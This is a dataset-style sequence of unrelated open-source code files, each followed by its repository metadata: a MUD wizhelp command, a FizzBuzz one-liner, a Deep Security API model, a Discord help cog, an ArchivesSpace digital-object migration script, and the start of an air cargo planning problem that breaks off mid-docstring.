| 1,819
|
py
|
# PythonWars copyright © 2020, 2021 by Paul Penner. All rights reserved.
# In order to use this codebase you must comply with all licenses.
#
# Original Diku Mud copyright © 1990, 1991 by Sebastian Hammer,
# Michael Seifert, Hans Henrik Stærfeldt, Tom Madsen, and Katja Nyboe.
#
# Merc Diku Mud improvements copyright © 1992, 1993 by Michael
# Chastain, Michael Quan, and Mitchell Tse.
#
# GodWars improvements copyright © 1995, 1996 by Richard Woolcock.
#
# ROM 2.4 is copyright 1993-1998 Russ Taylor. ROM has been brought to
# you by the ROM consortium: Russ Taylor (rtaylor@hypercube.org),
# Gabrielle Taylor (gtaylor@hypercube.org), and Brian Moore (zump@rom.org).
#
# Ported to Python by Davion of MudBytes.net using Miniboa
# (https://code.google.com/p/miniboa/).
#
# In order to use any part of this Merc Diku Mud, you must comply with
# both the original Diku license in 'license.doc' as well the Merc
# license in 'license.txt'. In particular, you may not remove either of
# these copyright notices.
#
# Much time and thought has gone into this software, and you are
# benefiting. We hope that you share your changes too. What goes
# around, comes around.
import interp
import merc
# noinspection PyUnusedLocal
def cmd_wizhelp(ch, argument):
    """List immortal (wizard) commands visible to the character, six per row.

    Only commands whose level is between LEVEL_HERO and the character's
    trust, and which are flagged show=True, are included.  The argument
    parameter is unused (standard command-handler signature).
    """
    buf = []
    col = 0
    for key, cmd in interp.cmd_table.items():
        if merc.LEVEL_HERO <= cmd.level <= ch.trust and cmd.show:
            # The original did `buf += "..."`, which extends the list one
            # character at a time; append the whole 12-wide cell instead.
            # The joined output is identical.
            buf.append("{:<12}".format(key))
            col += 1
            if col % 6 == 0:
                buf.append("\n")
    # Terminate a partial final row.
    if col % 6 != 0:
        buf.append("\n")
    ch.send("".join(buf))
# Register "wizhelp" in the interpreter's command dispatch table.
# level=4 and POS_DEAD mirror the other immortal commands in this codebase.
interp.register_command(
    interp.CmdType(
        name="wizhelp",
        cmd_fun=cmd_wizhelp,
        position=merc.POS_DEAD, level=4,
        log=merc.LOG_NORMAL, show=True,
        default_arg=""
    )
)
|
[
"jindrak@gmail.com"
] |
jindrak@gmail.com
|
5c271c70118c583d3b6474323b81753d0d70e29a
|
9f8221151b05e5acdf870cd7dd20a57323600deb
|
/lab_1_stub/fizzbuzzgolf.py
|
3e94ef4367bc431a32eb373d297dd5d702d4c486
|
[] |
no_license
|
HUFGhani/Software-Engineering-Concepts-In-Practice
|
b35e62e2b55af580eca93fc39fe197c729551406
|
1ed0d7c2f7a30c2bc9216127a39d2370013c9d6c
|
refs/heads/master
| 2021-07-24T15:00:25.962591
| 2017-10-13T09:31:29
| 2017-10-13T09:31:29
| 104,791,206
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 83
|
py
|
print ('\n'.join("Fizz"*(i%3==0)+"Buzz"*(i%5==0) or str(i) for i in range(1,101)))
|
[
"h.u.f.ghani@gmail.com"
] |
h.u.f.ghani@gmail.com
|
57c4ea5eb70c15ea7a90b28b122de6a2f363a5f5
|
3756357852562a6c8fe48f983e0da1610d10ce9c
|
/DeepSecuritySDK/DeepSecurityAPI/models/interface.py
|
5686431ca3f436bd5cd0364a5e04242e5ed876dc
|
[] |
no_license
|
johnsobm/deepsecuritySDK
|
5de8c788d190fa8c5b67fb0bb6b4c545ba74c754
|
d15ef79aea91d0c9a3a2bb4ac71b8060e0b67bfd
|
refs/heads/master
| 2020-04-03T22:53:11.692909
| 2018-10-31T23:40:47
| 2018-10-31T23:40:47
| 155,612,514
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,780
|
py
|
# coding: utf-8
"""
Trend Micro Deep Security API
Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501
OpenAPI spec version: 11.2.225
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Interface(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Python attribute name -> declared swagger type.
    swagger_types = {
        'interface_type_id': 'int',
        'name': 'str',
        'display_name': 'str',
        'id': 'int',
        'mac': 'str',
        'dhcp': 'bool',
        'i_ps': 'list[str]'
    }

    # Python attribute name -> JSON key used on the wire.
    attribute_map = {
        'interface_type_id': 'interfaceTypeID',
        'name': 'name',
        'display_name': 'displayName',
        'id': 'ID',
        'mac': 'MAC',
        'dhcp': 'DHCP',
        'i_ps': 'IPs'
    }

    def __init__(self, interface_type_id=None, name=None, display_name=None, id=None, mac=None, dhcp=None, i_ps=None):  # noqa: E501
        """Interface - a model defined in Swagger"""  # noqa: E501
        # All fields default to None; only explicitly supplied values are set
        # through the property setters below.
        self._interface_type_id = None
        self._name = None
        self._display_name = None
        self._id = None
        self._mac = None
        self._dhcp = None
        self._i_ps = None
        self.discriminator = None
        if interface_type_id is not None:
            self.interface_type_id = interface_type_id
        if name is not None:
            self.name = name
        if display_name is not None:
            self.display_name = display_name
        if id is not None:
            self.id = id
        if mac is not None:
            self.mac = mac
        if dhcp is not None:
            self.dhcp = dhcp
        if i_ps is not None:
            self.i_ps = i_ps

    @property
    def interface_type_id(self):
        """Gets the interface_type_id of this Interface.  # noqa: E501

        ID of the InterfaceType to which the Interface is mapped.  # noqa: E501

        :return: The interface_type_id of this Interface.  # noqa: E501
        :rtype: int
        """
        return self._interface_type_id

    @interface_type_id.setter
    def interface_type_id(self, interface_type_id):
        """Sets the interface_type_id of this Interface.

        ID of the InterfaceType to which the Interface is mapped.  # noqa: E501

        :param interface_type_id: The interface_type_id of this Interface.  # noqa: E501
        :type: int
        """
        self._interface_type_id = interface_type_id

    @property
    def name(self):
        """Gets the name of this Interface.  # noqa: E501

        Name of the Interface. Set automatically by the DSM.  # noqa: E501

        :return: The name of this Interface.  # noqa: E501
        :rtype: str
        """
        return self._name

    @name.setter
    def name(self, name):
        """Sets the name of this Interface.

        Name of the Interface. Set automatically by the DSM.  # noqa: E501

        :param name: The name of this Interface.  # noqa: E501
        :type: str
        """
        self._name = name

    @property
    def display_name(self):
        """Gets the display_name of this Interface.  # noqa: E501

        Display name of the Interface. Optionally set by the user.  # noqa: E501

        :return: The display_name of this Interface.  # noqa: E501
        :rtype: str
        """
        return self._display_name

    @display_name.setter
    def display_name(self, display_name):
        """Sets the display_name of this Interface.

        Display name of the Interface. Optionally set by the user.  # noqa: E501

        :param display_name: The display_name of this Interface.  # noqa: E501
        :type: str
        """
        self._display_name = display_name

    @property
    def id(self):
        """Gets the id of this Interface.  # noqa: E501

        ID of the Interface.  # noqa: E501

        :return: The id of this Interface.  # noqa: E501
        :rtype: int
        """
        return self._id

    @id.setter
    def id(self, id):
        """Sets the id of this Interface.

        ID of the Interface.  # noqa: E501

        :param id: The id of this Interface.  # noqa: E501
        :type: int
        """
        self._id = id

    @property
    def mac(self):
        """Gets the mac of this Interface.  # noqa: E501

        MAC Address of the interface.  # noqa: E501

        :return: The mac of this Interface.  # noqa: E501
        :rtype: str
        """
        return self._mac

    @mac.setter
    def mac(self, mac):
        """Sets the mac of this Interface.

        MAC Address of the interface.  # noqa: E501

        :param mac: The mac of this Interface.  # noqa: E501
        :type: str
        """
        self._mac = mac

    @property
    def dhcp(self):
        """Gets the dhcp of this Interface.  # noqa: E501

        Indicates whether the interface uses DHCP. The value is true if it uses DHCP.  # noqa: E501

        :return: The dhcp of this Interface.  # noqa: E501
        :rtype: bool
        """
        return self._dhcp

    @dhcp.setter
    def dhcp(self, dhcp):
        """Sets the dhcp of this Interface.

        Indicates whether the interface uses DHCP. The value is true if it uses DHCP.  # noqa: E501

        :param dhcp: The dhcp of this Interface.  # noqa: E501
        :type: bool
        """
        self._dhcp = dhcp

    @property
    def i_ps(self):
        """Gets the i_ps of this Interface.  # noqa: E501

        List of IPs used by the interface.  # noqa: E501

        :return: The i_ps of this Interface.  # noqa: E501
        :rtype: list[str]
        """
        return self._i_ps

    @i_ps.setter
    def i_ps(self, i_ps):
        """Sets the i_ps of this Interface.

        List of IPs used by the interface.  # noqa: E501

        :param i_ps: The i_ps of this Interface.  # noqa: E501
        :type: list[str]
        """
        self._i_ps = i_ps

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively convert nested models/lists/dicts of models.
        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, Interface):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
[
"brendanj@US-BRENDANJ-MAC.local"
] |
brendanj@US-BRENDANJ-MAC.local
|
69dacb4f5f1477c11add891b9db600180cf21595
|
d45b5fed94ebcce2757142498023fa6bae9c1f4d
|
/cogs/customhelp.py
|
41cae4e56c08920c35a1869427018e5aa5c041a6
|
[] |
no_license
|
Some1NamedNate/Inkxbot
|
56ed79cef68bc45bbe1b8b24369b03ed932254b3
|
d12555daca7f484b26b4502e5c760a97dd897909
|
HEAD
| 2018-09-01T13:40:54.546502
| 2018-06-04T00:04:15
| 2018-06-04T00:04:15
| 110,290,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,958
|
py
|
import discord
from discord.ext import commands
from discord.ext.commands import formatter
import sys
import re
import inspect
import itertools
import traceback
# Zero-width space, used as a placeholder for empty embed field values.
empty = u'\u200b'

# Neutralize mass mentions by inserting a zero-width space after '@'.
_mentions_transforms = {
    '@everyone': '@\u200beveryone',
    '@here': '@\u200bhere'
}


def rewrite():
    """Return True when running under discord.py 1.x (the "rewrite" API)."""
    return discord.version_info.major == 1


# Matches any key of _mentions_transforms for substitution.
_mention_pattern = re.compile('|'.join(_mentions_transforms.keys()))

# Original built-in help command, saved by Help.__init__ so __unload can
# restore it.
orig_help = None
class Help(formatter.HelpFormatter):
    """Formats help for commands."""

    def __init__(self, bot, *args, **kwargs):
        # Replace the built-in help command/formatter with this cog,
        # stashing the original so __unload can restore it.
        self.bot = bot
        global orig_help
        orig_help = bot.get_command('help')
        self.bot.remove_command('help')
        self.bot.formatter = self
        self.bot.help_formatter = self
        super().__init__(*args, **kwargs)

    # Shortcuts that allow cog to run on 0.16.8 and 1.0.0a
    def pm_check(self, ctx):
        """Return True when the context is a private/DM channel."""
        if rewrite():
            return isinstance(ctx.channel, discord.DMChannel)
        else:
            return ctx.message.channel.is_private

    @property
    def me(self):
        # Bot's member object in the current guild/server.
        if rewrite():
            return self.context.me
        else:
            return self.context.message.server.me

    @property
    def bot_all_commands(self):
        # Name of the command mapping differs between API versions.
        if rewrite():
            return self.bot.all_commands
        else:
            return self.bot.commands

    @property
    def avatar(self):
        if rewrite():
            return self.bot.user.avatar_url_as(format='png')
        else:
            return self.bot.user.avatar_url  # TODO: I really don't like not having a PNG

    @property
    def color(self):
        # Embeds in DMs have no member color; fall back to 0 (default).
        if self.pm_check(self.context):
            return 0
        else:
            return self.me.color

    async def send(self, dest, content=None, embed=None):
        """Version-agnostic message send."""
        if rewrite():
            await dest.send(content=content, embed=embed)
        else:
            await self.bot.send_message(dest, content=content, embed=embed)

    # All the other shit
    @property
    def author(self):
        # Get author dict with username if PM and display name in guild
        if self.pm_check(self.context):
            name = self.bot.user.name
        else:
            # NOTE(review): `not ''` is always True, so the display_name
            # branch is always taken here — the fallback to
            # self.bot.user.name is dead code; confirm intended condition.
            name = self.me.display_name if not '' else self.bot.user.name
        author = {
            'name': '{0} Help Manual'.format(name),
            'icon_url': self.avatar
        }
        return author

    @property
    def destination(self):
        # DM the invoker when pm_help is enabled, else reply in-channel.
        return self.context.message.author if self.bot.pm_help else self.context.message.channel

    def _add_subcommands(self, cmds):
        """Render (name, command) pairs as bold-name + short-doc lines."""
        entries = ''
        for name, command in cmds:
            if name in command.aliases:
                # skip aliases
                continue
            if self.is_cog() or self.is_bot():
                name = '{0}{1}'.format(self.clean_prefix, name)
            entries += '**{0}** {1}\n'.format(name, command.short_doc)
        return entries

    def get_ending_note(self):
        """Footer text shown on every help embed."""
        # command_name = self.context.invoked_with
        return "Type {0}help <command> for more info on a command.\n" \
               "You can also type {0}help <category> for more info on a category.".format(self.clean_prefix)

    async def format(self, ctx, command):
        """Formats command for output.

        Returns a dict used to build embed"""
        # All default values for embed dict
        self.command = command
        self.context = ctx
        emb = {
            'embed': {
                'title': '',
                'description': '',
            },
            'footer': {
                'text': self.get_ending_note()
            },
            'fields': []
        }

        description = command.description if not self.is_cog() else inspect.getdoc(command)
        if not description == '' and description is not None:
            description = '*{0}*'.format(description)

        if description:
            # <description> portion
            emb['embed']['description'] = description

        if isinstance(command, discord.ext.commands.core.Command):
            # <signature portion>
            emb['embed']['title'] = emb['embed']['description']
            emb['embed']['description'] = '`Syntax: {0}`'.format(self.get_command_signature())

            # <long doc> section
            if command.help:
                # First paragraph of the help text becomes the field name;
                # the rest (with [p] replaced by the prefix) is the value.
                name = '__{0}__'.format(command.help.split('\n\n')[0])
                name_length = len(name) - 4
                value = command.help[name_length:].replace('[p]', self.clean_prefix)
                if value == '':
                    value = empty
                field = {
                    'name': name,
                    'value': value,
                    'inline': False
                }
                emb['fields'].append(field)

            # end it here if it's just a regular command
            if not self.has_subcommands():
                return emb

        def category(tup):
            # Turn get cog (Category) name from cog/list tuples
            cog = tup[1].cog_name
            return '**__{0}:__**'.format(cog) if cog is not None else '**__\u200bNo Category:__**'

        # Get subcommands for bot or category
        if rewrite():
            filtered = await self.filter_command_list()
        else:
            filtered = self.filter_command_list()

        if self.is_bot():
            # Get list of non-hidden commands for bot.
            data = sorted(filtered, key=category)
            for category, commands in itertools.groupby(data, key=category):
                # there simply is no prettier way of doing this.
                field = {
                    'inline': False
                }
                commands = sorted(commands)
                if len(commands) > 0:
                    field['name'] = category
                    field['value'] = self._add_subcommands(commands)  # May need paginated
                    emb['fields'].append(field)
        else:
            # Get list of commands for category
            filtered = sorted(filtered)
            if filtered:
                field = {
                    'name': '**__Commands:__**' if not self.is_bot() and self.is_cog() else '**__Subcommands:__**',
                    'value': self._add_subcommands(filtered),  # May need paginated
                    'inline': False
                }
                emb['fields'].append(field)

        return emb

    async def format_help_for(self, ctx, command_or_bot, reason: str=None):
        """Formats the help page and handles the actual heavy lifting of how
        the help command looks like. To change the behaviour, override the
        :meth:`~.HelpFormatter.format` method.

        Parameters
        -----------
        ctx: :class:`.Context`
            The context of the invoked help command.
        command_or_bot: :class:`.Command` or :class:`.Bot`
            The bot or command that we are getting the help of.

        Returns
        --------
        list
            A paginated output of the help command.
        """
        self.context = ctx
        self.command = command_or_bot
        emb = await self.format(ctx, command_or_bot)

        if reason:
            emb['embed']['title'] = "{0}".format(reason)

        embed = discord.Embed(color=self.color, **emb['embed'])
        embed.set_author(**self.author)
        for field in emb['fields']:
            embed.add_field(**field)
        embed.set_footer(**emb['footer'])
        await self.send(self.destination, embed=embed)

    def simple_embed(self, title=None, description=None, color=None, author=None):
        # Shortcut
        embed = discord.Embed(title=title, description=description, color=color)
        embed.set_footer(text=self.bot.formatter.get_ending_note())
        if author:
            embed.set_author(**author)
        return embed

    def cmd_not_found(self, cmd, color=0):
        # Shortcut for a shortcut. Sue me
        embed = self.simple_embed(title=self.bot.command_not_found.format(cmd),
                                  description='Commands are case sensitive. Please check your spelling and try again',
                                  color=color, author=self.author)
        return embed

    @commands.command(name='help', pass_context=True, hidden=True)
    async def help(self, ctx, *cmds: str):
        """Shows help documentation.

        [p]**help**: Shows the help manual.

        [p]**help** command: Show help for a command

        [p]**help** Category: Show commands and description for a category"""
        self.context = ctx

        def repl(obj):
            # Defang @everyone/@here in user-supplied arguments.
            return _mentions_transforms.get(obj.group(0), '')

        # help by itself just lists our own commands.
        if len(cmds) == 0:
            await self.bot.formatter.format_help_for(ctx, self.bot)
            return

        elif len(cmds) == 1:
            # try to see if it is a cog name
            name = _mention_pattern.sub(repl, cmds[0])
            command = None
            if name in self.bot.cogs:
                command = self.bot.cogs[name]
            else:
                command = self.bot_all_commands.get(name)
                if command is None:
                    await self.send(self.destination, embed=self.cmd_not_found(name, self.color))
                    return
            await self.bot.formatter.format_help_for(ctx, command)
        else:
            # Multiple words: walk down the subcommand chain.
            name = _mention_pattern.sub(repl, cmds[0])
            command = self.bot_all_commands.get(name)
            if command is None:
                await self.send(self.destination, embed=self.cmd_not_found(name, self.color))
                return

            for key in cmds[1:]:
                try:
                    key = _mention_pattern.sub(repl, key)
                    command = command.all_commands.get(key)
                    if command is None:
                        await self.send(self.destination, embed=self.cmd_not_found(key, self.color))
                        return
                except AttributeError:
                    # Current command has no .all_commands: not a group.
                    await self.send(self.destination,
                                    embed=self.simple_embed(title=
                                                            'Command "{0.name}" has no subcommands.'.format(command),
                                                            color=self.color,
                                                            author=self.author))
                    return

            await self.bot.formatter.format_help_for(ctx, command)

    @help.error
    async def help_error(self, error, ctx):
        # Surface the error to the user and dump the traceback to stderr.
        await self.send(self.destination, '{0.__name__}: {1}'.format(type(error), error))
        traceback.print_tb(error.original.__traceback__, file=sys.stderr)

    def __unload(self):
        # Restore the stock formatter and the original help command.
        print('called __unload')
        self.bot.formatter = formatter.HelpFormatter()
        self.bot.add_command(orig_help)
def setup(bot):
    """Standard cog entry point: attach the custom Help formatter cog."""
    bot.add_cog(Help(bot))
|
[
"inkxthesquid@mail.com"
] |
inkxthesquid@mail.com
|
8090c20bccf212d15cf84a33921731317bd42fbf
|
969675dd8c44c5897f9113d982e87b08bd38353f
|
/EAD/aspace_migration/post_digital_objects.py
|
285df46dceac1f2046fdccfcbb5a30a3bade53d9
|
[] |
no_license
|
bentley-historical-library/archivesspace_migration
|
571b087dae3457329d4157351e7d037454550192
|
84b508f4f14aeb84b0efeebf4c00532122972771
|
refs/heads/master
| 2016-08-11T21:49:03.958670
| 2016-04-04T12:53:43
| 2016-04-04T12:53:43
| 52,303,628
| 0
| 1
| null | 2016-04-04T12:53:44
| 2016-02-22T20:34:02
|
Python
|
UTF-8
|
Python
| false
| false
| 9,556
|
py
|
import requests
from lxml import etree
import os
from os.path import join
import json
import re
import csv
import urlparse
import urllib2
import uuid
import getpass
import time
def post_digital_objects(ead_dir, digital_objects_dir, dspace_mets_dir, aspace_url, username, password,delete_csvs=False):
    """Create ArchivesSpace digital objects for every <dao> link in the EADs.

    For each EAD file in ``ead_dir``, every ``<dao>`` href is inspected:

    * Deep Blue (DSpace) handles (``http://hdl.handle.net/2027.42/...``) are
      matched to a METS file in ``dspace_mets_dir``; a digital object is
      posted whose components are the METS CONTENT bitstreams.
    * Any other href gets a simple digital object with one file version.

    Progress is tracked in CSV/TXT files under ``digital_objects_dir`` so a
    run can be resumed without re-posting (``posted_digital_objects.csv``),
    and errors / skipped handles are appended to side files.

    :param delete_csvs: when True, remove the tracking files first so the
        run starts from scratch.

    NOTE(review): this is Python 2 code (print statements, ``urlparse``
    module) -- it will not run under Python 3 as-is.
    """
    if not os.path.exists(digital_objects_dir):
        os.makedirs(digital_objects_dir)
    # Tracking files used to make the run resumable.
    posted_objects = join(digital_objects_dir, 'posted_digital_objects.csv')
    error_file = join(digital_objects_dir, 'digital_object_errors.txt')
    skipped_items_file = join(digital_objects_dir, 'skipped_items.txt')
    if delete_csvs:
        for csvfile in [posted_objects, error_file, skipped_items_file]:
            if os.path.exists(csvfile):
                os.remove(csvfile)
    # Load hrefs already posted in a previous run so they are not re-posted.
    already_posted = []
    if os.path.exists(posted_objects):
        with open(posted_objects,'rb') as csvfile:
            reader = csv.reader(csvfile)
            for row in reader:
                href = row[0]
                if href not in already_posted:
                    already_posted.append(href)
    # Authenticate once; the session token is reused for every POST below.
    auth = requests.post(aspace_url+'/users/'+username+'/login?password='+password+'&expiring=false').json()
    session = auth['session']
    headers = {'X-ArchivesSpace-Session':session}
    # Iterate through EADs. If you find a dao href that is a DSpace handle, open the METS from the dspace_mets folder
    # Assemble the digital object and the components as such:
    # Digital object title == EAD component title and dates
    # Digital object identifer and file version uri == dao href
    # Digital object component titles = Titles from METS
    # Digital object component labels == Labels from METS
    # First, post the digital object
    # Then, grab the uri from the posted digital object to set as the parent for each component and post those
    posted_dig_objs = {}
    skipped_items = []
    for filename in os.listdir(ead_dir):
        print "Posting digital objects from {0}".format(filename)
        tree = etree.parse(join(ead_dir,filename))
        daos = tree.xpath('//dao')
        for dao in daos:
            did = dao.getparent()
            href = dao.attrib['href'].strip()
            # TO DO -- Account for the same href showing up in different places
            # xlink show/actuate attributes default to 'new'/'onRequest' when absent.
            if 'show' in dao.attrib:
                show = dao.attrib['show']
            else:
                show = 'new'
            if 'actuate' in dao.attrib:
                actuate = dao.attrib['actuate']
            else:
                actuate = 'onRequest'
            # Normalize EAD casing ('onrequest') to the ASpace enum ('onRequest').
            xlink_actuate = actuate.replace('request','Request').replace('load','Load')
            if href.startswith('http://hdl.handle.net/2027.42') and href not in already_posted:
                # Deep Blue handle: derive the METS filename from the handle id.
                handlepath = urlparse.urlparse(href).path
                the_id = handlepath.split('/')[-1]
                if the_id + '.xml' in os.listdir(dspace_mets_dir):
                    print "Parsing DSpace METS for", href
                    metstree = etree.parse(join(dspace_mets_dir, the_id + '.xml'))
                    ns = {'mets':'http://www.loc.gov/METS/','dim': 'http://www.dspace.org/xmlns/dspace/dim','xlink':'http://www.w3.org/TR/xlink/'}
                    XLINK = 'http://www.w3.org/TR/xlink/'
                    # An optional <daodesc> paragraph becomes the digital object note
                    # (surrounding square brackets stripped).
                    daodesc = dao.xpath('./daodesc/p')
                    if daodesc:
                        digital_object_note = re.sub(r'^\[|\]$','',daodesc[0].text)
                    else:
                        digital_object_note = False
                    if did.xpath('./unittitle'):
                        component_title = etree.tostring(did.xpath('./unittitle')[0])
                    else:
                        component_title = 'OOPS THERES NO TITLE HERE'
                    # Strip inline EAD markup tags from the serialized title.
                    digital_object_title = re.sub(r'<(.*?)>','',component_title)
                    digital_object = {}
                    digital_object_components = []
                    digital_object['title'] = digital_object_title.strip()
                    digital_object['digital_object_id'] = str(uuid.uuid4())
                    digital_object['publish'] = True
                    digital_object['file_versions'] = [{'file_uri':href,'xlink_show_attribute':show,'xlink_actuate_attribute':xlink_actuate}]
                    if digital_object_note:
                        digital_object['notes'] = [{'type':'note','publish':True,'content':[digital_object_note],'jsonmodel_type':'note_digital_object'}]
                    digital_object_post = requests.post(aspace_url+'/repositories/2/digital_objects',headers=headers,data=json.dumps(digital_object)).json()
                    print digital_object_post
                    if 'error' in digital_object_post:
                        with open(error_file,'a') as f:
                            f.write(digital_object_post)
                    # NOTE(review): execution continues after logging an error, so the
                    # ['uri'] access below will raise KeyError on an error response --
                    # confirm whether a skip/continue was intended here.
                    digital_object_uri = digital_object_post['uri']
                    with open(posted_objects,'ab') as csvfile:
                        writer = csv.writer(csvfile)
                        writer.writerow([href,digital_object_uri])
                    posted_dig_objs[href] = digital_object_uri
                    # Each CONTENT bitstream in the METS becomes one component.
                    fileGrp = metstree.xpath("//mets:fileGrp[@USE='CONTENT']",namespaces=ns)[0]
                    bitstreams = fileGrp.xpath('.//mets:file',namespaces=ns)
                    position = 0
                    for bitstream in bitstreams:
                        FLocat = bitstream.xpath('./mets:FLocat',namespaces=ns)[0]
                        # This was originally being added to each file_version as file_size_bytes, but the max integer allowed is 2,147,483,647
                        # Still storing this for now in case we want to turn it into something else (like an extent) later
                        component_size = bitstream.attrib['SIZE']
                        if '{%s}label' % (XLINK) in FLocat.attrib:
                            # ASpace caps component labels at 255 characters.
                            component_label = FLocat.attrib['{%s}label' % (XLINK)].strip()[:255]
                        else:
                            component_label = None
                        component_href = 'http://deepblue.lib.umich.edu' + FLocat.attrib['{%s}href' % (XLINK)]
                        component_title = FLocat.attrib['{%s}title' % (XLINK)].strip()
                        digital_object_component = {
                            'digital_object':{'ref':digital_object_uri},
                            'title':component_title,
                            'label':component_label,
                            'position':position,
                            'file_versions':[{'file_uri':component_href}],
                            }
                        digital_object_components.append(digital_object_component)
                        position += 1
                    for component in digital_object_components:
                        digital_object_component_post = requests.post(aspace_url+'/repositories/2/digital_object_components',headers=headers,data=json.dumps(component)).json()
                        print digital_object_component_post
                        if 'error' in digital_object_component_post:
                            with open(error_file,'a') as f:
                                f.write(digital_object_component_post)
                else:
                    # Handle with no matching METS file: record and skip.
                    skipped_items.append(href)
                    with open(skipped_items_file,'a') as f:
                        f.write(href+'\n')
            elif href not in already_posted:
                # Non-DSpace href: post a simple digital object, no components.
                daodesc = dao.xpath('./daodesc/p')
                if daodesc:
                    digital_object_note = re.sub(r'^\[|\]$','',daodesc[0].text)
                else:
                    digital_object_note = False
                component_title = etree.tostring(did.xpath('./unittitle')[0])
                digital_object_title = re.sub(r'<(.*?)>','',component_title)
                digital_object = {}
                digital_object['title'] = digital_object_title.strip()
                digital_object['digital_object_id'] = str(uuid.uuid4())
                digital_object['publish'] = True
                digital_object['file_versions'] = [{'file_uri':href,'xlink_show_attribute':show,'xlink_actuate_attribute':xlink_actuate}]
                if digital_object_note:
                    digital_object['notes'] = [{'type':'note','publish':True,'content':[digital_object_note],'jsonmodel_type':'note_digital_object'}]
                digital_object_post = requests.post(aspace_url+'/repositories/2/digital_objects',headers=headers,data=json.dumps(digital_object)).json()
                print digital_object_post
                # NOTE(review): this branch tests 'invalid_object' while the DSpace
                # branch above tests 'error' -- confirm which key the API returns.
                if 'invalid_object' in digital_object_post:
                    with open(error_file,'a') as f:
                        f.write(digital_object_post)
                digital_object_uri = digital_object_post['uri']
                posted_dig_objs[href] = digital_object_uri
                with open(posted_objects,'ab') as csvfile:
                    writer = csv.writer(csvfile)
                    writer.writerow([href,digital_object_uri])
def main():
    """Configure local paths/credentials and run the digital-object posting.

    NOTE(review): paths and admin credentials are hard-coded for a local dev
    ArchivesSpace instance; no ``if __name__ == '__main__'`` guard is visible
    in this chunk -- confirm how ``main()`` is actually invoked.
    """
    project_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    aspace_ead_dir = join(project_dir, 'eads')
    digital_objects_dir = join(project_dir,'digital_objects')
    dspace_mets_dir = 'C:/Users/djpillen/GitHub/dspace_mets'
    aspace_url = 'http://localhost:8089'
    username = 'admin'
    password = 'admin'
    post_digital_objects(aspace_ead_dir, digital_objects_dir, dspace_mets_dir, aspace_url, username, password)
|
[
"djpillen@umich.edu"
] |
djpillen@umich.edu
|
03c6e0153ad4f0cfa7f2fcabcc34786572fbc82e
|
6f3140e1b0ab08930c31d9f36e85ffbb1b78e92b
|
/apps/teams/urls.py
|
535dc43dbf8e86e0d24523be0305e46b20be5a85
|
[] |
no_license
|
RossLote/propertymanager
|
337660ff05dfe99947873d1ddc3f786372eb41e6
|
d0f30a3156307249a04c4ffaa0eea83b4512b9cd
|
refs/heads/master
| 2021-01-10T15:28:20.396760
| 2016-02-15T09:21:43
| 2016-02-15T09:21:43
| 52,165,971
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 133
|
py
|
from django.conf.urls import url
from . import views
# URL routes for the teams app; currently empty (the list-view route below
# is intentionally disabled).
urlpatterns = [
    # url(r'^$', views.TeamsListView.as_view(), name='list'),
]
|
[
"rosslote@gmail.com"
] |
rosslote@gmail.com
|
2290f2fe24175f18adb69573d33225ba9b6bbf96
|
fba6e390dd9a91109cb6ee81b418c59d10af9d8a
|
/Implementing a Planning Search/my_air_cargo_problems.py
|
cc089f0ad465fbf332e9ce175743f609cad799bc
|
[] |
no_license
|
ExtremeGenerationIT/Artificial-Intelligence
|
8c5d056ac19cf4656b87ee22d527f1c479c8c596
|
c56db6b4aef69855c3fdc43d392edef7d7044fab
|
refs/heads/master
| 2021-01-21T17:29:56.653106
| 2017-11-26T16:49:42
| 2017-11-26T16:49:42
| 91,956,673
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,868
|
py
|
from aimacode.logic import PropKB
from aimacode.planning import Action
from aimacode.search import (
Node, Problem,
)
from aimacode.utils import expr
from lp_utils import (
FluentState, encode_state, decode_state,
)
from my_planning_graph import PlanningGraph
from functools import lru_cache
class AirCargoProblem(Problem):
    """Classical-planning formulation of the AIMA air-cargo domain.

    States are encoded as T/F strings over ``state_map`` (positive fluents
    followed by negative fluents); actions are ground (variable-free)
    Load/Unload/Fly operators built from the problem's cargos, planes and
    airports.
    """

    def __init__(self, cargos, planes, airports, initial: FluentState, goal: list):
        """

        :param cargos: list of str
            cargos in the problem
        :param planes: list of str
            planes in the problem
        :param airports: list of str
            airports in the problem
        :param initial: FluentState object
            positive and negative literal fluents (as expr) describing initial state
        :param goal: list of expr
            literal fluents required for goal test
        """
        # state_map fixes the fluent ordering used by encode/decode_state.
        self.state_map = initial.pos + initial.neg
        self.initial_state_TF = encode_state(initial, self.state_map)
        Problem.__init__(self, self.initial_state_TF, goal=goal)
        self.cargos = cargos
        self.planes = planes
        self.airports = airports
        self.actions_list = self.get_actions()

    def get_actions(self):
        """
        This method creates concrete actions (no variables) for all actions in the problem
        domain action schema and turns them into complete Action objects as defined in the
        aimacode.planning module. It is computationally expensive to call this method directly;
        however, it is called in the constructor and the results cached in the `actions_list` property.

        Returns:
        ----------
        list<Action>
